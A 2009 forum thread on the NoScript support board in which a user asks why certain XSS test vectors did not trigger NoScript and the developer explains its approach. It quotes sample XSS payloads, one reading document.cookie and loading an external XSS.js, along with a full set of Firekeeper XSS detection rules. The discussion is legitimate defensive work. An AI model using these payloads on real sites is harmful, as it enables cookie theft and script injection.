XSS exploit not detected by NoScript

General discussion about the NoScript extension for Firefox
Post Reply
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

XSS exploit not detected by NoScript

Post by luntrus » Mon Mar 23, 2009 3:51 pm

Hi Giorgio Maone,

The following attack vector: data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
was not being detected by NoScript when tested here: hxxp://bypass.xssing.com/testing.php?ve ... NjcmlwdD4=

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090322 Minefield/3.6a1pre

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: XSS exploit not detected by NoScript

Post by Alan Baxter » Mon Mar 23, 2009 4:02 pm

Thank you for posting this over here, luntrus. Was this one of the exploits tagged by Firekeeper?
http://forum.avast.com/index.php?topic= ... #msg364676
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7

User avatar
Giorgio Maone
Site Admin
Posts: 8700
Joined: Wed Mar 18, 2009 11:22 pm
Location: Palermo - Italy
Contact:

Re: XSS exploit not detected by NoScript

Post by Giorgio Maone » Mon Mar 23, 2009 4:05 pm

As I already explained elsewhere, this "exploit" is unrelevant to NoScript.
How is it exactly supposed to trigger, while NoScript is enabled?
data: URLs are blocked by NoScript on untrusted sites, and they inherit the same principal as the hosting page, so they're not cross-site.
So, can you show me plausible scenario in which this "exploit" can be successful with NoScript?

On a side note, where did you take it to test? It's the second time I see it wrongly reported as "XSS bypassing NoScript"...
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: XSS exploit not detected by NoScript

Post by luntrus » Mon Mar 23, 2009 7:56 pm

Hi Giorgio Maone,

I believe you when you say that when script is disabled to run, then no exploit can be executed.
That is simple logic, and everybody can understand that.
The tests are to be found here: http://www.xssing.com/index.php?x=1 (and subsequent pages)

Normally I get a Firekeeper alert like for instance this one:

Code: Select all

 === Triggered rule ===
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22http://www.site.com/XSS.js%22%3E%3C/script%3E


or Netcraft warns me here:
The page you are trying to visit is using Cross-Site Scripting (XSS).
This is a technique commonly used in phishing attacks.

URL: http://bypass.xssing.com/testing.php%3f ... ion(alert())%253E

If this is a mistake, please report it using
'Report Incorrectly Blocked URL' in the Netcraft Menu.

Do you still want to go there?


But I do not get a warning from NoScript, is this because I have RequestPolicy also active on the test page?

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre

User avatar
Giorgio Maone
Site Admin
Posts: 8700
Joined: Wed Mar 18, 2009 11:22 pm
Location: Palermo - Italy
Contact:

Re: XSS exploit not detected by NoScript

Post by Giorgio Maone » Mon Mar 23, 2009 8:29 pm

luntrus wrote:But I do not get a warning from NoScript, is this because I have RequestPolicy also active on the test page?

If you don't get the warning for any of the PoC there, it means that you don't have bypass.xssing.com in your whitelist: if there's no scripting, there's no cross-site scripting either.
If even after whitelisting bypass.xssing.com some PoCs don't trigger the warning, it just mean that the PoC as it is cannot work in Firefox, either because it's not compatible with Mozilla browser (e.g. attacks based on proprietary Microsoft extensions, such as CSS expressions), or is not correctly implemented (the 1st data: "PoC" is just flawed, it couldn't run on any browser as it is) or some secondary NoScript protection blocks its execution independently from XSS.

In other words, even though they are presented as "XSS exploits", those which don't trigger NoScript's warnings can be considered false positives if they do in FireKeeper. This is understandable, since FireKeeper uses generic hardcoded rules, a blacklist which is not specifically tailored on Firefox and in facts contain Microsoft-specific signatures for exploits which work on IE but mean nothing to Firefox.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: XSS exploit not detected by NoScript

Post by luntrus » Mon Mar 23, 2009 9:01 pm

Hi Giorgio Maone,

That is all understandable and is quite reassuring, so the protection of NoScript is completely full proof in these respects, and having Firekeeper there is just educational so that it will keep the browser user alert to what rules are eventually triggered.
I think it is never a bad thing for the security savvy user to be aware what is going on on the browser. I keep an eye on the error console and if something crops up I will report here off course.

The firekeeper rules against XXS exploits is as follows:

Code: Select all

 
#Rules to detect cross site scripting attacks


####Created by Thomas Kilgore

# javascript: uri schemes in GET requests
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"mocha:"; nocase; msg:"mocha: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"livescript:"; nocase;  msg:"livescript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

# normalish html tags using %3C and %3E in GET requests
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CIMG"; nocase; msg:"<img> tags GET request cross site scripting attempt"; url_re:"/%3Cimg.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"malformed <iframe< tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3C/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbody"; nocase; msg:"<body> tags GET request cross site scripting attempt"; url_re:"/%3Cbody.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CINPUT"; nocase; msg:"<input> tags GET request cross site scripting attempt"; url_re:"/%3CINPUT.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBGSOUND"; nocase; msg:"<bgsound> tags GET request cross site scripting attempt"; url_re:"/%3CBGSOUND.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clayer"; nocase; msg:"<layer> tags GET request cross site scripting attempt"; url_re:"/%3Clayer.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clink"; nocase; msg:"<link> tags GET request cross site scripting attempt"; url_re:"/%3Clink.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cstyle"; nocase; msg:"<style> tags GET request cross site scripting attempt"; url_re:"/%3Cstyle.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cmeta"; nocase; msg:"<meta> tags GET request cross site scripting attempt"; url_re:"/%3Cmeta.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cframe"; nocase; msg:"<frame> tags GET request cross site scripting attempt"; url_re:"/%3Cframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctable"; nocase; msg:"<table> tags GET request cross site scripting attempt"; url_re:"/%3Ctable.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cdiv"; nocase; msg:"<div> tags GET request cross site scripting attempt"; url_re:"/%3Cdiv.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctd"; nocase; msg:"<td> tags GET request cross site scripting attempt"; url_re:"/%3Ctd.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ca"; nocase; msg:"<a> tags GET request cross site scripting attempt"; url_re:"/%3Ca.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbase"; nocase; msg:"<base> tags GET request cross site scripting attempt"; url_re:"/%3Cbase.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cobject"; nocase; msg:"<object> tags GET request cross site scripting attempt"; url_re:"/%3Cobject.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Capplet"; nocase; msg:"<applet> tags GET request cross site scripting attempt"; url_re:"/%3Capplet.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cembed"; nocase; msg:"<embed> tags GET request cross site scripting attempt"; url_re:"/%3Cembed.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cxml"; nocase; msg:"<xml> tags GET request cross site scripting attempt"; url_re:"/%3Cxml.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cspan"; nocase; msg:"<span> tags GET request cross site scripting attempt"; url_re:"/%3Cspan.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Chtml"; nocase; msg:"<html> tags GET request cross site scripting attempt"; url_re:"/%3Chtml*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ct:set"; nocase; msg:"<t:set> tags GET request cross site scripting attempt"; url_re:"/%3Ct:set*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

# suspicious HTML-looking input.
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"%2F"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %2F. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"'"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and '. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)

####
Why there is not a specific one just for Firefox?
Furthermore, many, many thanks for your detailed explanation of the facts,

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre

User avatar
Giorgio Maone
Site Admin
Posts: 8700
Joined: Wed Mar 18, 2009 11:22 pm
Location: Palermo - Italy
Contact:

Re: XSS exploit not detected by NoScript

Post by Giorgio Maone » Mon Mar 23, 2009 9:44 pm

luntrus wrote: Why there is not a specific one just for Firefox?

Because NoScript exists for Firefox ;)

BTW, just at glance from the rules you pasted, BGSOUND is not supported by Firefox, and the last rule clearly reveals some of these rules are IE-specific:

Code: Select all

# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)


NoScript doesn't use generic blacklists like these: it takes a different, more specific and yet more flexible approach, by checking if JavaScript code is being injected and if it's actually compilable in Firefox's JavaScript engine.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)

Post Reply